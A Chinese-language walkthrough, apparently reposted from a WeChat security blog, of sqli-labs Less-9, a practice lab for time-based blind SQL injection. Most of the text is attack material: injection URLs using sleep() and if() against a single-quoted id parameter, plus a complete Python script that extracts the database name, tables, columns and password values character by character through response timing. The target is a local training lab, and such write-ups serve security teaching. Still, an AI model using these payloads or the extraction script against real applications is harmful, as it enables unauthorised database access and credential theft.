sqli-labs less9详解(附py脚本)

admin

138718
文章

114
评论

2023年8月5日20:02:45评论25 views字数 3921阅读13分4秒阅读模式

分析题目

从标题就可以看到《基于时间-单引号》，所以很明显的这关要我们利用延时注入进行，同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。

需要知道的函数

1、sleep(5)：延时5秒

2、if(a,b,c)：a为条件，正确返回b，否则返回c

sqli-labs less9详解(附py脚本)

1、判断是否存在单引号延时注入

http://127.0.0.1/Less-9/index.php?id=1' and sleep(5) --+

sqli-labs less9详解(附py脚本)

服务器5秒后才有相应，说明是存在的

2、获取数据库长度，如果数据库名的长度等于8停留5秒

http://127.0.0.1/sqli/Less-9/?id=1' and sleep(if((length(database())=8),5,0)) --+

sqli-labs less9详解(附py脚本)

同样5秒后服务器才有相应，说明长度为8

http://127.0.0.1/sqli/Less-9/?id=1' and sleep(if((length(database())=7),5,0)) --+

长度为7的话，服务器响应就很快，1秒不到，后面的操作都是这样进行判断，看服务器的响应时间来进行注入

sqli-labs less9详解(附py脚本)

3、获取数据库名称的每个字母，如果判断正确停留5秒，最后知道数据库名字为"security"

http://127.0.0.1/sqli/Less-9/?id=1' and sleep(if((mid(database(),1,1)='s'),5,0)) --+

4、获取数据库中的表名，最后得出其中的一个表为users

http://127.0.0.1/sqli/Less-9/?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u'),5,0)) --+

5、获取users表中的字段，得到users中password字段

http://127.0.0.1/Less-9/index.php?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_name='users' limit 2,1),1,1)='p'),5,0)) --+

6、获取users表中password字段内容，最终获取一个名为admin的内容

http://127.0.0.1/sqli/Less-9/?id=1' and sleep(if((mid((select password from users limit 7,1),1,1)='a' ),5,0)) --+

python脚本如下：

import requestsimport timeimport datetimeurl = "http://127.0.0.1/Less-9/index.php"p1 = 'abcdefghijklmnopqrstuvwxyz'#获取数据库长度def database_len():    for i in range(1,10):        payload = "?id=1' and if(length(database())>%s,sleep(4),0)--+"%i        url1 = url +payload        #print(url1)        time1 =datetime.datetime.now()        r=requests.get(url=url1)        time2=datetime.datetime.now()        time3 = (time2-time1).total_seconds()    #计算时间差， 忽略天 只看时分秒   total_seconds() 真正的时间差 包含天        if time3 >= 4:            print(i)        else:            print(i)            break    print('数据库长度为:',i)
#database_len()

#获取数据库名def datebase_name():    name=''    for i in range(1,9):        for j in p1:            payload="?id=1' and if(substr(database(),%s,1)='%s',sleep(4),1)--+" %(i,j)            url1=url+payload            #print(url1)            time1=datetime.datetime.now()            r=requests.get(url=url1)            time2=datetime.datetime.now()            time3=(time2-time1).total_seconds()            if time3 >= 4:                name += j                print(name)                break    n = name    print('数据库名字为:'+n)
#datebase_name()
#获取表def tables_name():    global table4    table1=''    table2=''    table3=''    table4=''    for i in range(5):        for j in range(1,6):            for t in p1:                payload="?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'),3,0)) --+"%(i,j,t)                url1=url+payload                #print(url1)                time1=datetime.datetime.now()                r=requests.get(url=url1)                time2=datetime.datetime.now()                time3=(time2-time1).seconds                if time3 >= 3:                    if i == 0:                        table1 +=t                        print('第一个表为:',table1)                    elif i == 1:                        table2 += t                        print('第二个表为：',table2)                    elif i == 2:                        table3 +=t                        print('第三个表为：',table3)                    elif i == 3:                        table4 += t                        print('第四个表为：',table4)                    else:                        break    print('第一个表为'+table1)    print('第二个表为'+table2)    print('第三个表为' + table3)    print('第四个表为' + table4)

#tables_name()
#获取表中的字段def table_column():    global column3    column1=''    column2=''    column3=''    f=table4    for i in range(3):        for j in range(1,9):            for t in p1:                payload="?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_name='%s' limit %s,1),%s,1)='%s'),5,0)) --+"%(f,i,j,t)                url1 =url+payload                #print(url1)                time1 = datetime.datetime.now()                r = requests.get(url=url1)                time2 = datetime.datetime.now()                time3 = (time2 - time1).seconds                if time3 >= 5:                    if i == 0:                        column1 += t                        print('字段一为：'+column1)                    elif i == 1:                        column2 += t                        print('字段二为：'+column2)                    elif i == 2:                        column3 += t                        print('字段三为:'+column3)                    else:                        break    print('users字段一为：'+column1)    print('字段二为：'+column2)    print('字段三为：',column3)

#table_column()
def s_content():    content1=''    f1= column3    f2= table4    for i in range(20):            for t in p1:                payload = "?id=1' and sleep(if((mid((select %s from %s limit 7,1),%s,1)='%s' ),3,0)) --+"%(f1,f2,i,t)                url1 =url+payload                #print(url1)                time1=datetime.datetime.now()                r = requests.get(url=url1)                time2 = datetime.datetime.now()                time3 = (time2-time1).seconds                if time3 >=3:                        content1 += t                        print('password字段一内容为：'+content1)                        break
    print('字段内容为：'+content1)

start_time=time.time()database_len()datebase_name()tables_name()table_column()s_content()end_time=time.time()end_start_time=end_time-start_timeprint('总花费时间为',end_start_time,'秒')

运行大概需要4分钟，效果如下

sqli-labs less9详解(附py脚本)

原文始发于微信公众号（鹏组安全）：sqli-labs less9详解(附py脚本)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

sqli-labs less9详解(附py脚本)

【vulnhub】lampiao

MCP安全检查清单：AI⼯具⽣态系统安全指南 | Windows 11高危漏洞：300毫秒即可提权至管理员

Alibaba Sentinel的SSRF

一起站库分离的数据库对内扫描事件

docker逃逸方式总结分享

千万不能告诉DeepSeek的十件事

【密码喷洒攻防实战】Microsoft Entra SSO功能的滥用与防御

【漏洞与预防】畅捷通文件上传漏洞预防

实战攻防 | 1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

几千个产品的默认账号密码

发表评论

在线咨询

微信